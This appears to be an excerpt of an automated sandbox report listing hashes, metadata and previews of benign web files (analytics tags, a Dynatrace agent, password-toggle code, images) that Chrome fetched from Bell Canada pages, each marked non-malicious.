                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 41 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):604
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.420022861572022
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7Zs57VnpnrjgwOFa3EX7bcavAOPhDgf57jwfXWXiikz71b0kc:Es57nj3ANDfDgf57cfFBb01
                                                                                                                                                                                                                                                                                                                                      MD5:AC4B395846DB5942E72D401FA05775DC
                                                                                                                                                                                                                                                                                                                                      SHA1:AF4C0218A835EBBD0897A6A6FF329DBA2DF11BC6
                                                                                                                                                                                                                                                                                                                                      SHA-256:9B749E17DDB0B069C94CBB8FF74787C169B9307D3CF95FC4599A27410AC2D15C
                                                                                                                                                                                                                                                                                                                                      SHA-512:DA931F04DE454F892653BE37B7A6C29AD31D11E69E0260C6D890DBD66AA63EEF10380BD5663406BC56ED846D62C8E5CE526E098F7BC3FB6639305ED4E107515D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...)...#.......#.....bKGD..............IDATX..M.Ma....\?1..e.w7EJM..B~B)J..l&+..%Kem55..R.......$2V.A..&2.cq.[w.;5.~g......|....s..}..d...F..9yf`......D;.~.N..4..G.. [...8^D.*.*.[.....sEW.(..EQR..K4'..8<7J.....Z.^.qo#Bun...:ON.=..IG.dW.(.Y....F....=.V.....+.3...G=...S.<p.Q.\...Z.....V.G.;`...8.........x..P{.e.x..E}..Po.c.........z..6..2.;Y.|K...@..s.Q*+.FAm.."..p.J]O4.S..T...M..F..B2"~.{g.o....!Y}.K.}5.?E..j/0.D.........I`5...o..j.u9...!X.i......'.z.....u.1..p.8....dJ.E.dV.u..[R.Bj..+..@...W..7..5.u0I.Q'..&..j...R?....T...FrW.}.....p.]:......."......IEND.B`.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):8
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.5
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:x:x
                                                                                                                                                                                                                                                                                                                                      MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                                                                                                                                                                      SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                                                                                                                                                                      SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                                                                                                                                                                      SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net/eum/results.txt
                                                                                                                                                                                                                                                                                                                                      Preview:Success!
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):353110
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.418038120576255
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:8JV0N1lfYs/tZoZjNPjn+A1MJsmcnuuPITeddzhca68RsBWeuU+VufG9ZmkXB+il:8JVotra8A1MGm8uuwTeTia68Rsse2A8
                                                                                                                                                                                                                                                                                                                                      MD5:D11C31961B2F1A4819D7A2EFB9C7232B
                                                                                                                                                                                                                                                                                                                                      SHA1:42321C1A40A003A52EA7E9024826E3477E0C43D4
                                                                                                                                                                                                                                                                                                                                      SHA-256:E59685C749B3371CB179B9B671415513A21B3024AB9E7FE98622A09400950BAD
                                                                                                                                                                                                                                                                                                                                      SHA-512:73AA831541793D06A808D8AE0C3DC8F12B7213375CD2ED0526EB831C7E71E619D297235BA8F970756BA11C826336B2DEE1415A84FD256D4DF2C8FD9E47EB1C6D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (740)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):887
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.446921814250921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zl7Iuct/BMl7I8NM8E6GKplkIJrYYKRWa0DqJK4Wa05ajHxQ:zl7Itt/BMl7I8N9lkwHWhn1jxQ
                                                                                                                                                                                                                                                                                                                                      MD5:3818BC730EF492E85BA9898D40A134D8
                                                                                                                                                                                                                                                                                                                                      SHA1:73AB53526E41414B786EB0DBA9B0C8B040007BE5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2546C848C5DCAFFD7F24D336ED5D204062909B898FE55C50A363249770385BB5
                                                                                                                                                                                                                                                                                                                                      SHA-512:605B1074196E13A4F8A504434A17B5B6EDA89E3C30FEA6F90E2E6955618AE39EF769E3715FD9832AE09741D8D75C41055D074327B589B73A68245F9A3F50C0E1
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd8b65dba67c44432abc9811e00526643-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd8b65dba67c44432abc9811e00526643-source.min.js', "try{var __bda_promise_twtr=new Promise((function(e,t){var r,n,a,i,o,s,c=(r=window,n=document,a=\"script\",!void(r.twq||(i=r.twq=function(){i.exe?i.exe.apply(i,arguments):i.queue.push(arguments)},i.version=\"1.1\",i.queue=[],(o=n.createElement(a)).async=!0,o.src=\"//static.ads-twitter.com/uwt.js\",(s=n.getElementsByTagName(a)[0]).parentNode.insertBefore(o,s)))),u=\"en\"==_satellite.getVar(\"d_language\")?\"nu9ts\":\"nuhbc\";twq(\"init\",u),twq(\"track\",\"PageView\"),c?e(\"success\"):t(\"error\")}))}catch(e){console.log(\"Adobe Launch: Error: Window Loaded - Twitter(Site wide):\",e)}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):58461
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.45589060622783
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:hmbkMPxZ7DwimgTLEx+15c0XQTb5wB8iqP0/o:EbPPxBDwimgTLEx+15c0qc/o
                                                                                                                                                                                                                                                                                                                                      MD5:E78F0ECE001F35745B3B1860EEF2349A
                                                                                                                                                                                                                                                                                                                                      SHA1:9E924FDE3BF91233945E9943D264CA145B9E6009
                                                                                                                                                                                                                                                                                                                                      SHA-256:637F9951678DDEABF6ECEED5AC992585A52CDF7236729ED78A7C811068907DA4
                                                                                                                                                                                                                                                                                                                                      SHA-512:0221169E72167CF1BB11154D19F3DD9E134E151DA8E987026C0BC22242FAB31C1274151A7792759EAC50AC40A82C79F381AFDA841B0BCE1A50FF96CA26C750EE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(652,18-19): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(652,50-51): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i.. */..var BELL = (function(bell, $) {.. 'use strict';.. .. $.ajaxMock = function(context) {.. if (context.url === "/ajax/Feedback/SaveRating") {.. console.warn("mock $.ajax!");.. context.success('["ratingId","dfa8d1fe-906a-4c64-bbbd-030cf4b75abb"]');.. } else if (context.url === "/ajax/Feedback/SaveFeedback") {.. console.warn("mock $.ajax!");.. context.success('["succeeFlag","Y"]');.. } else {.. $.ajax(context);.. }.. };.. bell.mteSupportModules = bell.mteSupportModules || {};.. bell.mteSupportModules.feedback = (function() {.. function enCode(input) {.. var i;.. var result = "";.. if (input) {..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1629)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):341434
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.610140131068381
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:mrl40frXFUOOkXyh4S/J8ME9ifUUIcNUzNcCs+SOHw2aN:mre6/OkXyhR9E9+Uj26BsKo
                                                                                                                                                                                                                                                                                                                                      MD5:AE7E05FE0E966FA7253CD6AE563F5BAE
                                                                                                                                                                                                                                                                                                                                      SHA1:EE45D718FC726C997E339A54F0B06DDEC096F024
                                                                                                                                                                                                                                                                                                                                      SHA-256:949B63051BA550CABCF8541D921703F31FEAEF9506D7D45096C43C24A5C9B3E9
                                                                                                                                                                                                                                                                                                                                      SHA-512:56B33ED92FC98F7060DD175B62584D657E7CFC275E034F0A99C9E4680EFB782913CFEFCC81B1211DD6CD433B77F95A57E7C9CF7E70DE25BCCF29C2AE8E9B99F5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js
                                                                                                                                                                                                                                                                                                                                      Preview:/*. Copyright and licenses see https://www.dynatrace.com/company/trust-center/customers/reports/ */.(function(){function Ka(){document.cookie="".concat("__dTCookie","=").concat("1",";SameSite=Lax");var Oa=document.cookie.includes("__dTCookie");document.cookie="".concat("__dTCookie","=").concat("1","; expires=Thu, 01-Jan-1970 00:00:01 GMT");return Oa}function fb(){return void 0===cb.dialogArguments?navigator.cookieEnabled||Ka():Ka()}function mb(){var Oa;if(fb()){var Pa=cb.dT_,Wa=null===Pa||void 0===Pa?void 0:Pa.platformPrefix;if(!Pa||Wa){var Ra=null===Pa||void 0===Pa?void 0:Pa.minAgentVersion;Ra&&."10299241001084140"<Ra+""?window.console.log("[CookiePrefix/initConfig] Min agent version detected, and javascript agent is older - the javascript agent will not be initialized!"):(Ra=(Oa={},Oa.cfg="#CONFIGSTRING#|auto=#AUTO#|domain=#DOMAIN#|rid=RID_#REQUEST_ID#|rpid=#RESPONSE_ID#|app=#APP#",Oa.iCE=fb,Oa.platformCookieOffset=null===Pa||void 0===Pa?void 0:Pa.platformCookieOffset,Oa),Wa&&(Ra.pla
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6658
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.707264480149804
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:O/Nguk4ZivAkYZ5UkYIQvIqq+ZPwk5cyUs:Ol9J98/N
                                                                                                                                                                                                                                                                                                                                      MD5:E9435F2410BCC234F248B722CB061BBD
                                                                                                                                                                                                                                                                                                                                      SHA1:D473786B2F29A86DE01C0267C3985247C2D3A371
                                                                                                                                                                                                                                                                                                                                      SHA-256:2D0ED1CB6B9C042A7C207C6A50EC8740AF6F9B1AC0E0A5D0DDA026C05B2034D5
                                                                                                                                                                                                                                                                                                                                      SHA-512:6A946A70C5999C86FBBDC934E61B1FD58A9CE567C7EAAD159AF039F997F8B33829EA21611CCFC023774CE164D58D11F468E0BA9CAAAA265F3A00D65C6E159954
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:../* Required for Show/Hide Password Button widget..---------------------------------------------- */..//Modified as per change request form Business..function maskUnmaskPws(obj) {...var txtShow = jQuery('#showText').val();.. var txtHide = jQuery('#hideText').val();.. var showHideButton = $('.maskUnMaskPwsBtn');.. var showLabel = jQuery('#showLabel').val(), hideLabel = jQuery('#hideLabel').val();...if (obj.prev('input').attr('type') == 'password') {....obj.parents(".row").find(".maskUnMaskPwsBtn").html(txtHide);....obj.parents(".row").find(".maskUnMaskPwsTxtBox").attr('type', 'text'); ....var SearchInput = obj.prev("input");....var strLength = SearchInput.val().length * 2;....obj.prev("input").focus();.. SearchInput[0].setSelectionRange(strLength, strLength);.. showHideButton.attr('aria-label', hideLabel);...}...else {....obj.parents(".row").find(".maskUnMaskPwsBtn").html(txtShow);....obj.parents(".row").find(".maskUnMaskPwsTxtBox").attr('type', 'password');....v
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 430x290, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12690
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.884145620947392
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:DXji43uwhrMo+jUgJvM+FSQB/qeg4fzr5x+nlQ92:64+R/jfvMO7fv3+lw2
                                                                                                                                                                                                                                                                                                                                      MD5:A66F1A71245272EF47B3FB6E5C3C9835
                                                                                                                                                                                                                                                                                                                                      SHA1:1F2D2E92FA99E4C169A72E815BEFC262B37C1DD6
                                                                                                                                                                                                                                                                                                                                      SHA-256:3DA0A9F0C5D3821AAA894C3EBF0793E06364A8CBA038B1DF3764FE90B200817B
                                                                                                                                                                                                                                                                                                                                      SHA-512:46B69264BBB44249CD59EBD85A58504FB7C5BEB6CC564D382434F5639F89F390E2A0AFEEAF398897D62FC6D4A5E15069194850B54164621976541A612BFE305E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/rsx/mybell/img/mybell-changing-plans-md.jpg?ver=202106071946
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................".....................................................0...................|......t........6.O..................J..zP......8.:.n.u...._P.....>.......*.....@.....O.O.nm...~C...............G.........1......u....R......>W.5.u...../..........W.*.A.......h:.oQO>.................e.~........~v.Yq...m......?...-..z..lz}......0...&.._;..y>Sn.}............ulmg.[.l...W......+c..........%.t.........8.....kO.63..|.>....8nRi`..s.8.>.....X..^...n...A.M6...".f).....?3..l..;p...c..2..y.(......^a.^f.....>q....9d..+.l..d.....{P...'.R.Ise...|.G..].8y..Q.mf......>I....m....O.Q..b..0.$.,}.p.......hu.-.._._G*......._]...~......k..O..l'..N.P...7.0W.t.....@.....%..V....9.9.].QGG...]6........O._.%....q.t.d.....yC..gO[.l....r..OO....S.:j..[........k..__.......K......Rk)G....W...5.#s...I.......a..f..U=.?d..i....5rX...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2270)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7513
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174923337424814
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:4rxcWAu5oUyPD5VwErrx6HuWQ5t9Uvt7dOeQhqFG:4rnDEhUQFwt7dOeQhd
                                                                                                                                                                                                                                                                                                                                      MD5:BD9FB73BC98AF0C45A25519C18ED4060
                                                                                                                                                                                                                                                                                                                                      SHA1:9036A5BDAE31DE8BB7B392A2B6E5335D485CCE76
                                                                                                                                                                                                                                                                                                                                      SHA-256:D9EBE6D5A7AD67B00C0EB95EA12D9272952C75F3FAFA74F62D53B5746974A301
                                                                                                                                                                                                                                                                                                                                      SHA-512:36FA1C14195F5BCCA21588303230329A5CCB38824A1072A0264EDFA91EBA103B65BAABD32CB440CC1282396F53E414F574D160FD914D364D9AE1F4F3185A6732
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html lang="en_CA">.<head>. <meta charset="utf-8">. <title>Request Rejected / Requ.te rejet.e</title>. <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">. [if IE]>. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />. <![endif]-->. <style>. /* Bell Slim */. body {. background: #fff;. line-height: 1.42857143;. font-family: Arial, sans-serif;. font-size: 14px;. color: #555;. margin: 0;. }. .container {. margin: 0 auto;. max-width: 960px;. padding: 0 15px;. }. .container:before,. .container:after {. content: '';. display: table;. }. .container:after {. clear: both;. }. .rsx-page-content {. min-height: calc(100vh - 124px);. }. .rsx-txt-center {. text-align: center !important;. }. .rsx-block {. display: block !important;. }. h1 {. color: #111;. margin: 20px 0;. }. hr {. background-color: #E1E1E1;. bo
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.9563592468495585
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREUYYYFCMyqXXl6EcHUP1CSHI:UrXiIYYaqX1hRo
                                                                                                                                                                                                                                                                                                                                      MD5:86754516A32D53E45879AF077E6B7046
                                                                                                                                                                                                                                                                                                                                      SHA1:315E5D5C9B264AAF56EDA0CD4E1E7FD63752D3AD
                                                                                                                                                                                                                                                                                                                                      SHA-256:A68853A6C11CB26DC08946BBDBA6EBD600F7B732255825D8BA1B284890667438
                                                                                                                                                                                                                                                                                                                                      SHA-512:4CF53067A7CA74EBA9C9CEA1832C5940D768B5BB6B94FB3414E2297DB897388F89475B327DF1192E0490D9644A569BCBDEAE5253084DC8EBF96AFA9B81667F22
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__14
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__14 === 'function' && branch_callback__14("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (711)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.441955589066
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlA2dct/BMlA2vJUYJlJiJQJSJ/8rVnXvIQrZIC2Hpb:zlQt/BMlVHgqYx8rVAgaCq
                                                                                                                                                                                                                                                                                                                                      MD5:3353F3431C4748CD263D463EC565E30A
                                                                                                                                                                                                                                                                                                                                      SHA1:9E9855B8C847B1F87438D036215EE73249CDC0CB
                                                                                                                                                                                                                                                                                                                                      SHA-256:5F5D1984D2DFBC1A5B0B9FA079191FA6C3D0463B84A095EF4389B734A04EBAA9
                                                                                                                                                                                                                                                                                                                                      SHA-512:B9BD99E4C30FA437B5A3F2138CE03DC704A09465A6604871EC1EF147E7B1126ED5323F70E3F381DDDD53FB9F4DDF9BA283E591838458B6A4BF7165F47133AF46
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC8cd32b50cbd048ffb3664f99a7839a96-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC8cd32b50cbd048ffb3664f99a7839a96-source.min.js', "var consent=_satellite.getVar(\"d_consent\");if(1===consent?.advertising&&\"undefined\"!=typeof gtag){var isPV=_satellite.getVar(\"d_is_pageview\"),_ss1=_satellite.getVar(\"s_SS1\")||\"\",_ss2=_satellite.getVar(\"s_SS2\")||\"\",_aw=\"AW-953414520\",_cf=_satellite.getVar(\"s_cookie_flags\")||\"\";_ss1=_ss1.toLowerCase(),\"smart home\"==(_ss2=_ss2.toLowerCase())&&(_aw=\"AW-1068483847\"),\"mobile\"!=_ss2&&\"cart mobility\"!=_ss2&&\"checkout mobility\"!=_ss2||(_aw=\"AW-1070746166\"),isPV&&gtag(\"config\",_aw,{cookie_flags:_cf,allow_enhanced_conversions:!0})}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.446854365656768
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:UY7yhyXPZssUcPK:UY+EBssU+K
                                                                                                                                                                                                                                                                                                                                      MD5:0DC94F396EB4AE9BE6FFBB0712AC46D5
                                                                                                                                                                                                                                                                                                                                      SHA1:E37C6D04472FF2919039D5531E43C7109A3089B1
                                                                                                                                                                                                                                                                                                                                      SHA-256:F7312AE609D2FB8910D194214B0C2F006ED15BE27D9E45BE3EB3FDDEF5759D01
                                                                                                                                                                                                                                                                                                                                      SHA-512:F23B675BCBB9B8E2D946F9CBEBA1D03ECD82B69EDD8F5A259BD4CACB4C18346B94DF08F802DCA7D25B4B4DC42655ACAED5769354F3859E2FF652AAB275675335
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://siteimproveanalytics.com/js/siteanalyze_1154.js
                                                                                                                                                                                                                                                                                                                                      Preview:/* Subscription expired - 2023-10-25T15:30:11 */
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
